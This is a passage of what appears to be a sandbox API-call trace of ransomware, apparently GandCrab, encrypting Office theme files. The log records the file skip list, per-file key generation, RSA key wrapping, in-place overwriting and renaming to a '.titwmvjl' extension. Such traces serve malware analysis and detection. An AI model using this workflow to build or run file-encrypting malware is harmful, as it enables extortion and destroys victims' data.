(lpString1="TM03457515[[fn=View]].thmx", lpString2="desktop.ini") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="autorun.inf") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="ntuser.dat") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="iconcache.db") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="bootsect.bak") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="boot.ini") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="ntuser.dat.log") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="thumbs.db") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="ntldr") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="NTDETECT.COM") returned 1 [0075.432] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="Bootfont.bin") returned 1 [0075.432] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 128 [0075.432] lstrlenW (lpString=".thmx") returned 5 [0075.432] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.432] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0075.432] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.433] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.433] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457515[[fn=view]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0075.433] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.433] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0075.443] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.443] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.444] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.444] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.444] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.444] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.444] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0075.444] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.445] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.445] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.445] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.445] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.445] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.445] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.446] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.446] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0075.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.446] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.446] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.446] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.447] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503278) returned 1 [0075.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.447] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.447] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.447] GetLastError () returned 0x0 [0075.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.447] CryptDestroyKey (hKey=0x503278) returned 1 [0075.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.447] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.448] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.448] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5034b8) returned 1 [0075.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.448] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.449] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.449] GetLastError () returned 0x0 [0075.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.449] CryptDestroyKey (hKey=0x5034b8) returned 1 [0075.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.449] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.449] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0075.449] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0075.449] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x76cc4, lpOverlapped=0x0) returned 1 [0075.476] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff8933c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.476] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x76cc4, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x76cc4, lpOverlapped=0x0) returned 1 [0075.485] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.485] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0075.487] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.490] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.492] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.492] CloseHandle (hObject=0x2ec) returned 1 [0075.499] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457515[[fn=view]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457515[[fn=view]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0075.500] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.500] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0075.500] lstrcmpW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2=".") returned 1 [0075.500] lstrcmpW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="..") returned 1 [0075.501] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033917[[fn=Berlin]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx" [0075.501] lstrlenW (lpString=".titwmvjl") returned 9 [0075.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 130 [0075.501] VirtualAlloc (lpAddress=0x0, dwSize=0x144, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0075.501] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx.titwmvjl") returned 139 [0075.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 130 [0075.501] lstrlenW (lpString=".thmx") returned 5 [0075.501] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.501] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0075.501] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0075.501] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 130 [0075.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 130 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="desktop.ini") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="autorun.inf") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="ntuser.dat") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="iconcache.db") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="bootsect.bak") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="boot.ini") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="ntuser.dat.log") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="thumbs.db") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="ntldr") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="NTDETECT.COM") returned 1 [0075.502] lstrcmpiW (lpString1="TM04033917[[fn=Berlin]].thmx", lpString2="Bootfont.bin") returned 1 [0075.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 130 [0075.502] lstrlenW (lpString=".thmx") returned 5 [0075.502] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.502] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0075.502] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.503] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.503] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033917[[fn=berlin]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0075.503] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.503] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0075.510] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.510] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.510] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.511] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.511] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.511] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.511] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0075.511] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.511] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.511] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.512] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.512] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.512] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.512] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.512] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0075.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.513] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.513] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.513] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.513] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503938) returned 1 [0075.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.514] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.514] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.514] GetLastError () returned 0x0 [0075.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.514] CryptDestroyKey (hKey=0x503938) returned 1 [0075.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.514] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.515] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.515] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503938) returned 1 [0075.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.515] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.515] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.516] GetLastError () returned 0x0 [0075.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.516] CryptDestroyKey (hKey=0x503938) returned 1 [0075.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.516] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.516] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0075.516] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0075.516] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0xee481, lpOverlapped=0x0) returned 1 [0075.798] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff11b7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.798] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xee481, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0xee481, lpOverlapped=0x0) returned 1 [0075.805] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.806] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0075.807] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.811] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.814] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.815] CloseHandle (hObject=0x2ec) returned 1 [0075.838] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033917[[fn=berlin]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033917[[fn=berlin]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0075.838] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.839] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0075.839] lstrcmpW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2=".") returned 1 [0075.839] lstrcmpW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="..") returned 1 [0075.839] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM04033919[[fn=Circuit]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx" [0075.839] lstrlenW (lpString=".titwmvjl") returned 9 [0075.839] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 131 [0075.839] VirtualAlloc (lpAddress=0x0, dwSize=0x146, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0075.839] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx.titwmvjl") returned 140 [0075.839] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 131 [0075.839] lstrlenW (lpString=".thmx") returned 5 [0075.839] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.840] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0075.840] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0075.840] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 131 [0075.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 131 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="desktop.ini") returned 1 [0075.840] lstrcmpiW (lpString1="TM04033919[[fn=Circuit]].thmx", lpString2="autorun.inf") returned 1 [0075.840] lstrcmpiW 